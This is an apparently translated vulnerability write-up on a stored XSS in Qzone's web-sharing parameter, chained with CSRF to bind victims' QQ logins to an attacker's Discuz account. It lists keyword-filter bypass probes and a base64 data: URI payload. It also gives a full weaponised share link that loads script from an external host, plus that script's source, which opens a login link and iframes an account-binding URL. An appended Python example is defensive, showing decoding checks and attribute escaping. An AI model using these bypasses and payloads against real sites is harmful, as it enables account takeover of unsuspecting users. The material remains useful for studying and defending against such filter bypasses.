Exploiting a QQ Zone (Qzone) stored XSS together with a CSRF vulnerability to hijack accounts on other websites (the 403 interception of sensitive tags can be bypassed)
1. All tests come from fuzzing (every judgment is based on the returned content; apologies if any judgment is wrong).
2. The XSS output point is not filtered. However, if a sensitive tag keyword is entered, the server returns a 403 error, but the check is not strict.
3. Some people say the title is too long and too grand.
(The exploitation method has been added below.)
1. When sharing a web page to Qzone, the url parameter does not filter double quotation marks:
①.
②.
2. Although this parameter is not filtered, as soon as you enter a tag that can trigger an event the system returns 403 and the page goes blank. For example, entering the following makes the page inaccessible:
">
<
3. If some ordinary tags are entered and no JS is triggered, the request is not blocked. The test cases were:
   [tag lost in extraction] → intercepted
   [tag lost in extraction] → not intercepted
   <script/src="//11"> → intercepted
   <scr/src="//11"> → not intercepted
   <iframe/src="//11"> → intercepted
   <if/src="//11"> → not intercepted
   <a/href="javascript:alert(/1/)"> → intercepted
4. We ran many more tests below and listed them. From the above it can be seen that interception is based on keywords.
5. However, when testing <a/href="data:text/html;base64,XXXXXX">, there are two cases:
   ①. First case, <br>: <a/href="data:text/html;base64,PGJyPg=">aaa</a> → not intercepted
   ②. Second case: <a href="data:text/html;base64,pgltzy9zcm9ijeil29uzxjyb3i9imfszxj0kc8xlykipg=">aaa</a> → intercepted
6. In that case the first case can be combined with the second. <br> gets through; if the encoding of <br> is carried together with the encoding of the payload, can it get past the 403? So the following test encodes <br> plus the payload, with the trailing equals sign URL-encoded because an equals sign cannot appear in the url:
   pgjypjxpbwcvc3jpsixii9vbmvycm9ypsjhbgvydcgvms8pij4%3d
7. It is not intercepted.
8. Submit it and look at the Qzone source code.
9. Click it and test.
10. In the window, check the source: it turns out the pop-up really came from Qzone. However, this point is too small and people will hardly click it. A CSS style can be added to enlarge the XSS point.
11. With the XSS point enlarged by CSS, the link shows up wherever the mouse moves (marked in red).
12. The reviewer then said an exploitation method is required. When I submitted this vulnerability I said that clicking the login link from another website returns 403, but a local jump from the QQ chat window or from Qzone is not blocked, as shown in the figure.
14. Although this XSS is not in the qq.com domain, the referer is Qzone, which means the login link can be opened. That is, the previous vulnerability can be exploited through this one.
Exploitation test:
1. First construct the code:
   <br><script/src="http://guanggao456.sinaapp.com/1.js"></script>
2. Encode it (Base64 encoding, then URL encoding):
   PGJyPjxzY3JpcHQvc3JjPSJodHRwOi8vZ3VhbmdnYW80NTYuc2luYWFwcC5jb20vMS5qcyI%2bPC9zY3JpcHQ%2b
3. Get the share link for the web page, publish it to Qzone, and it is embedded directly into the personal center of the space:
http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=http%3A%2F%2Fdonghua.dmzj.com%2F%23%22%3E%3Ca/href%3d%22data:text/html;base64,PGJyPjxzY3JpcHQvc3JjPSJodHRwOi8vZ3VhbmdnYW80NTYuc2luYWFwcC5jb20vMS5qcyI%2bPC9zY3JpcHQ%2b%22style%3d%22left:0px;top:%200px;%20width:%20100%25;%20height:%20100%25;%20position:%20fixed;%22&title=%E5%BE%88%E4%B9%85%E5%BE%88%E4%B9%85%E6%A0%B9%E6%8D%AE%E5%9B%BD%E5%AE%B6%E6%A0%B9%E6%8D%AE%E5%9B%BD%E5%AE%B6&desc=&summary=&site=
4. The code in http://guanggao456.sinaapp.com/1.js is:
   window.onload = function aa() { window.open("xxxxxxxxxxxxxxxxx"); }; // put your login link here, so that other people's computers log in to your account
   function bb() {
       var e = document.createElement('iframe');
       e.setAttribute('src', 'http://www.discuz.net/connect.php?mod=login&op=init&type=loginbind&referer=home.php?mod=spacecp&ac=plugin&id=qqconnect:spacecp');
       document.body.appendChild(e);
   };
   setTimeout("bb()", 2000); // 2-second delay before opening the Discuz community bind link
5. Used together, the code above enlarges the XSS point in the personal status in Qzone until it fills the whole screen. Then, when the user enters their personal center to look at the status, the mouse click is almost certain and the XSS runs: window.open opens the configured login link, then after two seconds an iframe is created that opens the link binding a QQ account to the Discuz community, and then ...........................
--------------------------------------------------------------------------------------------
6. Test images
1. You can see the CSS enlarging the XSS point to full screen.
2. When a user clicks a blind spot in the space, the XSS triggers the attack: first my login link is opened, then the countdown to the account binding starts.
3. Visit the share link given in step 3 above to share the web page; the content of http://guanggao456.sinaapp.com/1.js is as given in step 4.
Solution:
Filter the url parameter properly.
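As an added example (not part of the report, and not Qzone's or Discuz's code), the following Python models the keyword-based interception the report observes in steps 3 to 7 and shows two defensive checks: decoding base64 data: URIs before applying any keyword rule, and, more robustly, allowlisting the scheme and HTML-attribute-encoding the url parameter so that a double quote can never terminate the attribute it is inserted into. The regex patterns, the function names and the 403 model are assumptions of this example; the sample url value is the URL-decoded form of the share link quoted in step 3.

```python
"""Added example: why a keyword blacklist fails against data: URIs, and two fixes.

The blacklist is a model of what the report observed, not the real filter.
All sample inputs are constructed for this example.
"""
import base64
import html
import re
from urllib.parse import unquote, urlsplit

# Model of the keyword interception the report describes: a hit means HTTP 403.
SENSITIVE = re.compile(r"<script|<iframe|javascript:", re.IGNORECASE)

# A base64 data:text/html URI as it appears inside an attribute value.
# '%' is accepted so that URL-encoded padding such as %3d is captured too.
DATA_URI = re.compile(
    r"data:\s*text/html\s*;\s*base64\s*,\s*([A-Za-z0-9+/=%]+)", re.IGNORECASE
)


def keyword_blocked(value: str) -> bool:
    """True if the naive blacklist would answer 403 for this raw value."""
    return SENSITIVE.search(value) is not None


def decode_data_uris(value: str) -> list[str]:
    """Decode every base64 data:text/html URI in value (after URL-decoding),
    so the same keyword rule can be run on the markup it carries."""
    decoded = []
    for blob in DATA_URI.findall(value):
        raw = unquote(blob)                 # %3d -> '=' etc.
        raw += "=" * (-len(raw) % 4)        # tolerate stripped padding
        try:
            decoded.append(base64.b64decode(raw, validate=True).decode("utf-8", "replace"))
        except (ValueError, UnicodeDecodeError):
            continue                        # not valid base64: nothing to inspect
    return decoded


def deep_keyword_blocked(value: str) -> bool:
    """Blacklist applied to the raw value and to every decoded data: URI body."""
    return keyword_blocked(value) or any(keyword_blocked(d) for d in decode_data_uris(value))


def safe_share_url(url: str) -> str:
    """The real fix: allowlist the scheme, then attribute-encode the value.
    Raises ValueError for anything that is not an absolute http(s) URL."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        raise ValueError("only absolute http(s) URLs may be shared")
    return html.escape(url, quote=True)     # '"' -> &quot;, '<' -> &lt;, '>' -> &gt;


def is_rejected(url: str) -> bool:
    """Helper for checks: True if safe_share_url refuses the value."""
    try:
        safe_share_url(url)
    except ValueError:
        return True
    return False


# Constructed sample: URL-decoded url= parameter from the report's share link.
B64 = "PGJyPjxzY3JpcHQvc3JjPSJodHRwOi8vZ3VhbmdnYW80NTYuc2luYWFwcC5jb20vMS5qcyI+PC9zY3JpcHQ+"
SAMPLE_URL = (
    'http://donghua.dmzj.com/#"><a/href="data:text/html;base64,' + B64 + '"'
    + 'style="left:0px;top:0px;width:100%;height:100%;position:fixed;">'
)

if __name__ == "__main__":
    print("raw keyword check blocks it:   ", keyword_blocked(SAMPLE_URL))
    print("decoded data: URI bodies:      ", decode_data_uris(SAMPLE_URL))
    print("deep keyword check blocks it:  ", deep_keyword_blocked(SAMPLE_URL))
    print("attribute-encoded value:       ", safe_share_url(SAMPLE_URL))
    print("data: URL rejected by allowlist:", is_rejected("data:text/html;base64,PGJyPg=="))
```

The decoding step shows why the report's base64 trick works: the raw parameter never contains the string `<script`, so a keyword rule sees nothing, while the decoded body is exactly the `<br><script/src=...>` markup from step 1. Decoding closes that particular gap, but the attribute-encoding in `safe_share_url` is what actually removes the injection, because the page's own markup is no longer reachable from the parameter regardless of what the parameter contains.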